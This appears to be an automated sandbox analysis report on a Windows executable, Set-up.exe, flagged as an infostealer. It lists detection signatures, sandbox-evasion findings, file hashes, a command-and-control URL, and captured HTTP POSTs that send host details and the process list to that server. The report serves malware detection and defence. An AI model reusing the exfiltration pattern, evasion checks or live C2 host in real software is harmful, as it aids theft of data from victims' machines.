Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1582042
MD5:	fb412d366acb254b7870e17ea228e971
SHA1:	6217577b0421b22d98717a23b46b884481d298e7
SHA256:	db605eba071eeeb78c1aa93a018046699cca2a5260e9601f599cd96c55cccd9d
Tags:	exeuser-aachum
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Contain functionality to detect virtual machines

Infostealer behavior detected

Leaks process information

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: FB412D366ACB254B7870E17EA228E971)

cleanup

Code function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,

0_2_0002255D

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1Host: home.eleventh11pt.topAccept: /Content-Type: application/jsonContent-Length: 499220Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 33 31 36 30 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global traffic	HTTP traffic detected: GET /nJdxBxrKAaFnbbAEfLtg1735465836?argument=0 HTTP/1.1Host: home.eleventh11pt.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1Host: home.eleventh11pt.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View

ASN Name: FREE-MPEIRU FREE-MPEIRU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_000EA8C0 recvfrom,

0_2_000EA8C0

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nJdxBxrKAaFnbbAEfLtg1735465836?argument=0 HTTP/1.1Host: home.eleventh11pt.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.eleventh11pt.top

Source: unknown

HTTP traffic detected: POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1Host: home.eleventh11pt.topAccept: */*Content-Type: application/jsonContent-Length: 499220Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 33 31 36 30 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sun, 29 Dec 2024 15:51:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sun, 29 Dec 2024 15:51:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: Set-up.exe	String found in binary or memory: http://.css
Source: Set-up.exe	String found in binary or memory: http://.jpg
Source: Set-up.exe	String found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836
Source: Set-up.exe, 00000000.00000003.1811748473.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1813418338.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1
Source: Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0
Source: Set-up.exe, 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFn
Source: Set-up.exe	String found in binary or memory: http://html4/loose.dtd
Source: Set-up.exe	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/hsts.html
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exe	String found in binary or memory: https://httpbin.org/ip
Source: Set-up.exe, 00000000.00000003.1692006117.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip9
Source: Set-up.exe	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CE4F22	0_3_00CE4F22
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CE4E31	0_3_00CE4E31
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000305B0	0_2_000305B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00036FA0	0_2_00036FA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000EB180	0_2_000EB180
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00370032	0_2_00370032
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003AA000	0_2_003AA000
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0032C050	0_2_0032C050
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003AE050	0_2_003AE050
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000CE070	0_2_000CE070
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00210080	0_2_00210080
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001900F0	0_2_001900F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000F00E0	0_2_000F00E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0028E138	0_2_0028E138
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002B0170	0_2_002B0170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00194170	0_2_00194170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0033C1A0	0_2_0033C1A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00086210	0_2_00086210
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001B0200	0_2_001B0200
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0037E2F0	0_2_0037E2F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002E42F0	0_2_002E42F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000962E0	0_2_000962E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003962D0	0_2_003962D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000EC320	0_2_000EC320
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00210350	0_2_00210350
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002DA3A0	0_2_002DA3A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000EE3E0	0_2_000EE3E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00374410	0_2_00374410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00182430	0_2_00182430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000F0420	0_2_000F0420
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0038C470	0_2_0038C470
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00390460	0_2_00390460
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002DE450	0_2_002DE450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001424A0	0_2_001424A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0006E520	0_2_0006E520
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00390560	0_2_00390560
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003885A0	0_2_003885A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A0590	0_2_003A0590
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0028E5D0	0_2_0028E5D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0002E620	0_2_0002E620
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0039A610	0_2_0039A610
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003666B0	0_2_003666B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0007E6A0	0_2_0007E6A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002E26E0	0_2_002E26E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00386730	0_2_00386730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001A8730	0_2_001A8730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000EC770	0_2_000EC770
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0020A780	0_2_0020A780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A4780	0_2_003A4780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002687D0	0_2_002687D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0039A800	0_2_0039A800
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003748A0	0_2_003748A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000DC900	0_2_000DC900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00034940	0_2_00034940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0002A960	0_2_0002A960
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0039E940	0_2_0039E940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A0940	0_2_003A0940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001949F0	0_2_001949F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00114A00	0_2_00114A00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0038EA70	0_2_0038EA70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000A6AA0	0_2_000A6AA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001F6AC0	0_2_001F6AC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00218AC0	0_2_00218AC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002DAAC0	0_2_002DAAC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002DAB2C	0_2_002DAB2C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00368B30	0_2_00368B30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0037CB00	0_2_0037CB00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00250B60	0_2_00250B60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002E0B70	0_2_002E0B70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001B4B60	0_2_001B4B60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00386BB0	0_2_00386BB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0002CBB0	0_2_0002CBB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00398BF0	0_2_00398BF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0020ABC0	0_2_0020ABC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00368C70	0_2_00368C70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003ACC90	0_2_003ACC90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00366C80	0_2_00366C80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00394D50	0_2_00394D50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A4D40	0_2_003A4D40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0039CD80	0_2_0039CD80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00368DF0	0_2_00368DF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000D2DC0	0_2_000D2DC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0031CE30	0_2_0031CE30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0033AE30	0_2_0033AE30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00186E90	0_2_00186E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00148F20	0_2_00148F20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00044F70	0_2_00044F70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000EEF90	0_2_000EEF90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000E8F90	0_2_000E8F90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00372F90	0_2_00372F90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00346F80	0_2_00346F80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001AAFC0	0_2_001AAFC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0020AFC0	0_2_0020AFC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00223020	0_2_00223020
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0037F010	0_2_0037F010
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001FF040	0_2_001FF040
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000310E6	0_2_000310E6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00211100	0_2_00211100
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00141140	0_2_00141140
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001F1190	0_2_001F1190
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001FD1D0	0_2_001FD1D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001AD230	0_2_001AD230
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000BB2D0	0_2_000BB2D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001A7310	0_2_001A7310
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0039B380	0_2_0039B380
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0020B3F0	0_2_0020B3F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002C33F0	0_2_002C33F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0038D430	0_2_0038D430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0038F430	0_2_0038F430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00143450	0_2_00143450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003974A0	0_2_003974A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001FB4B0	0_2_001FB4B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003935B0	0_2_003935B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0020F5B0	0_2_0020F5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0008F5B0	0_2_0008F5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0002D5C0	0_2_0002D5C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003855E0	0_2_003855E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003735C0	0_2_003735C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00389650	0_2_00389650
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000B5670	0_2_000B5670
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003596B0	0_2_003596B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002C36A0	0_2_002C36A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0039B6F0	0_2_0039B6F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000936D0	0_2_000936D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003756D0	0_2_003756D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00397730	0_2_00397730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0036B720	0_2_0036B720
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0009D740	0_2_0009D740
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001A9790	0_2_001A9790
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003B17A0	0_2_003B17A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00395780	0_2_00395780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003837E0	0_2_003837E0
